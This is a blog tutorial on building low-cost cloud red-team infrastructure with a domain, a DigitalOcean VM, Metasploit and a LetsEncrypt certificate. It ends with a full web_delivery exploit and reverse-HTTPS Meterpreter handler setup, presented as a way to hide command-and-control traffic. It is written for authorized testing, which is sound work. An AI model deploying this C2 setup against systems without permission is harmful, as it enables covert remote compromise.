Open in app

Sign in

Write

Sign in

How To: Build Inexpensive Red Team Infrastructure

Secprentice
7 min readOct 3, 2018

The information and techniques shown below should only be used in lab environments or environments where explicit permission to use these techniques has been granted by the network administrator. Please do not use or reference this material in any illegal activity. In this guide I advocate the use of Digital Ocean and Namecheap. I recommend these companies because I have had a pleasant experience with them not because I have financial motivation to do so. There are no affiliation links on this blog.

I was recently asked to join a red team against a new detection technology that my employer wanted to proof of concept. (Bear in mind we have only ever Blued Teamed) We figured we could spin up a Kali VM in the cloud, launch some Metasploit exploits and start lateral movement. We were very wrong. Most of the training material we found is outdated and fragmented across the internet. So, over the course of two weeks we learned about and built our very own attack infrastructure in the cloud. This guide aims document our journey and help other red team novices get basic attack infrastructure running.

What you will need:

  • Some basic knowledge of Linux
  • Basic knowledge of Metasploit
  • Money (A small amount) The software we are using here is mostly free but the infrastructure is not. You or your company will need to pay between $10 & $20 to get things started. This will cover the cost of a domain name and a months worth of infrastructure on a host like DigitalOcean or Vultr

1: Register a domain

I think adding a domain to our attack infrastructure gives it some authenticity and professionalism. You can get a domain for less than $1 here.

Once you have registered your domain we need to modify its Name Servers. This changes allows you to manage your domain from inside DigitalOcean which makes our lives easier in later in the process.
If you purchased your domain somewhere other than Namecheap, a guide on changing nameservers can be found here.

1.1: Add the Digital Ocean Name Servers and click the tick:

In the next step we will be building a cloud virtual machine that will host Metasplpoit. We will also be creating some SSH keys.

What you will need:

  • If you are running a Windows OS you will need Putty
  • An account on DigitalOcean or similar
  • Your domain from step one

2: Generate SSH keys

Before doing anything else, we need to generate a key pair that will allow us to remotely access our Linux Virtual Machine. If you are familiar with this
process skip to the next step. If you are running Linux or Mac use this guide.

2.1: Open PuTTYgen.exe and click Generate

You must move your mouse to generate a key.

2.2: Copy your Public Key and save it as a text file in a safe place.
We will need it later.

2.3: Save your Public & Private Key (These are important you will need them for step three)

3: Create your VirtualMachine

Click Create and choose Ubuntu or Debian

3.3: Add the SSH public key generated earlier
(The one you saved to a safe place)

3.4: Click Create

Now we need to tell the your domain (Redteamblues.pw in my case) to forward all requests to your new Digital Ocean VM.

3.5: Open the Networking tab and add your domain and DNS Record

Linking of Domain and DNS Record in DigitalOcean

3.6: Test connectivity

Ping your doamin and check the IP matches your droplet IP

Notice the ping returns the same IP that belongs to our DigitalOcean droplet. This shows our DNS settings are correct.

Tea Break

This is a great point for a Tea Break.

Next up we will install and configure Metasploit with HTTPS!
To continue, you will need to SSH to our new VM.
I am going to explain how to do this via Putty on Windows. If you are familiar with this process, skip the next step.

4: Installing Metasploit

4.1: Open Putty and enter your DigitalOcean IP (Or domain name)

4.2: Navigate down the left menu to find Auth settings and add the Privkey you created in Step 2.

Load your private key from the key pair creation process in Step 2

4.3: Connect and login with root

SSHing with root. No password needed as we have public/private key authentication

4.4: Install Metasploit framework.

To install Metasploit, run this command on your DigitalOcean VM:

curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && \ chmod 755 msfinstall && \ ./msfinstall

Metasploit installation script

3.5: Check Metasploit is working
Load the Metasploit console with the command:

msfconsole will open Metasploit

5: Setting up HTTPS with LetsEncrypt

To improve the stealth of our C&C infrastructure we should hide our communications with HTTPS.
Most networks wont be doing proper HTTPS decryption/inspection so encrypting our communication will drastically increase our chances of staying under the radar.
In this part of the guide we will be installing CertBot and using it to pull down a HTTPS certificate for our domain (Redteamblues.pw in my case)

I must thank Abhinav Singh and Nipun Jaswal for the information provided in their book: Metasploit Penetration Testing Cookbook which has made this part of possible.

5.1: Install Lets Encrypt Certbot with the below command:

apt install letsencrypt -y

5.2: Request HTTPS Certificate
Now we have LetsEncrypt installed we can request a cert with the below command.
Make sure you change example.com to your domain!

sudo certbot certonly –standalone –preferred-challenges http -d example.com

Before we try and use our new certificate we must join the private and public key together. This can be achieved with the the cat command.
Make sure to swap example.com for your domain name

cd /etc/letsencrypt/live/example.com/ cat privkey.pe m cert.pem >> /root/unified.pem

Checkpoint

  • Domain purchased
  • Domain name servers changed
  • Domain pointed to VM (DNS change)
  • Virtual Machine running in the cloud with Metasploit installed
  • LetsEncrypt cert created
  • Certificates joined with CAT command

Now we are finally ready to use Metasploit. Fire up the console:

msfconsole

From here we can run all of the regular Metasploit tools that we expect inside a Kali VM. The key difference is that we are internet facing with a real domain and SSL cert.
To make use of your SSL cert and domain you will need to set the below settings in your modules.

Be sure to change the values highlighted to those of your VM IP and domain.

set HandlerSSLCert /root/unified.pem
set sslcert /root/unified.pem
set ssl true
set StagerVerifySSLCert true
set lhost example.com
set ReverseListenerBindaddress XX.XX.XX.XX

For my domain a full exploit and handler setup would look like this:

use exploit/multi/script/web_delivery
set payload windows/x64/meterpreter/reverse_https
set ReverseListenerBindaddress XX.XX.XX.XX < VM IP HERE
set srvport 443 set HandlerSSLCert /root/unified.pem
set sslcert /root/unified.pem
set ssl true
set lhost example.com < domain here
set StagerVerifySSLCert true
set target 3
set lport 8443

This exploit and payload will configure a small web server on port 443 and deliver a Meterpreter payload.
C2 Communication will run over port 8443 to redteamblues.pw fully encrypted!

I hope this guide has helped you build out some useful and inexpensive red team infrastructure in the cloud. If you have any questions or wish to make a suggestion; tweet me @secprentice

Originally published at secprentice.xyz on October 3, 2018.

Red Team
Metasploit
Infosec
Cybersecurity
Penetration Testing

--

--

Secprentice

Written by Secprentice

20 Followers

Blue Team Infosec person. Sharing information to help other blue team people. https://twitter.com/secprentice

Help

Status

About

Careers

Blog

Privacy

Terms

Text to speech

Teams